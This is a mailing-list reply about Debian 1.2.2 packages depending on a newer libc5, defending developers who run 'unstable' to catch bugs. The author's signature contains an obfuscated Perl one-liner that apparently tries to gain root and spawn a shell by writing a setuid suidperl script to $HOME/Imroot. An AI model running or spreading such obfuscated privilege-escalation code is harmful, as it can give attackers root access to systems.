Re: Debian 1.2.2 and dependency on libc5 (>= 5.4.17-1)

> Note: this linking ahead of the release libraries is not limited to
> non-free, or caused by its seperation from the distribution proper. The
> cause comes from maintainers trying to keep their "development" systems up
> to date with "unstable".. These folks need to be made aware of the
> difficulties caused by this practice and discouraged from doing this to
> release packages.

If developers don't track unstable and catch bugs with new packages, who
is going to do it?

(BTW, I think this discussion should be moved to debain-devel.)

--
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod             joey@kite.ml.org
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_